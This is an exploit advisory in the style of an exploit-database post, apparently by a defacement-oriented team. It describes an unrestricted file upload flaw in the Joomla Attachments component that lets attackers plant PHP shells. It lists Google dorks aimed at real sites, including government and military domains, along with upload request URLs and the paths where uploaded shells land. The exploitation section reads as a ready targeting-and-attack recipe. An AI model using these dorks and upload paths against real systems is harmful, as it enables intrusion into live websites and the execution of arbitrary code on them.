#################################################################### # Exploit Title : Joomla Attachments Components 3.2.6 Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 18/02/2019 # Vendor Homepage : jmcameron.net # Software Download Links : jmcameron.net/attachments/ jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip joomlacode.org/gf/project/attachments/frs/ github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/ # Software Information Links : extensions.joomla.org/extension/attachments/ joomlacode.org/gf/project/attachments/ joomlacode.org/gf/project/attachments3/ # Software Version : 2.2.2 and 3.2.6 / All previous versions. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_attachments'' intext:''Desenvolvido com o CMS de codigo aberto Joomla'' site:mil.br intext:''JSN Mico template designed by JoomlaShine.com'' site:gov.my intext:''(c) Copyright 2011 TrekDesk Treadmill Desk.'' intext:''Tasarym ve Yazylym : 2A Ajans Unternet ve Tanytym Hizmetleri'' intext:''HLAVNI STRANKA - POCASI - SELF BRIEFING'' site:cz intext:''(c) 2017 Panzaldomus s.r.l. | Corso Nazionale, 88 - 84020 Controne (SA)'' intext:''Desarollo eAprando.com'' site:py intext:''(c) Dom Pomocy Spolecznej w Moczarach 2019'' intext:Seniorenverband BRH Niedersachsen intext:''RasaByte'' site:org intext:''CITTA DELLA GIOIA ONLUS 2019'' and more on Google and other Search Engines...... # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ] CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** The 'Attachments' extension allows files to be uploaded and attached to content articles in Joomla. Includes a plugin to display attachments and a component for uploading and managing attachments. #################################################################### # Impact : *********** Joomla Attachments Components 3.2.6 and other previous versions could allow a remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation of file extensions by the multiple scripts to index.php. The issue occurs because the application fails to adequately sanitize user-supplied input. Exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. #################################################################### # Arbitrary File Upload/Shell Upload Exploit : **************************************** /index.php?option=com_attachments&task=upload&article_id=[PUT-ID-NUMBER-HERE]&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&article_id=11&tmpl=component&from=closeme /index.php/en/?option=com_attachments&task=upload&article_id=21&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=url&parent_id=[PUT-ID-NUMBER-HERE]&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=file&parent_id=22&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=url&parent_id=34&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=url&parent_id=142&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&parent_id=,new&parent_type=com_content.article&from=closeme&editor=article # Directory File Paths : ******************** /index.php?option=com_attachments&task=download&id=[ID-NUMBER] /index.php?option=com_attachments&task=download&file=[FILENAME.php] /attachments/article/[ID-NUMBER]/[FILENAME.php] /index.php?option=com_attachments&task=update&id=index.php&update=file[FILENAME.php]&tmpl=component&from=article /administrator/components/com_attachments/........ /administrator/components/com_attachments/views/attachments/tmpl/........ Note : It is unknown exactly where the file is located. You have to search carefully. #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################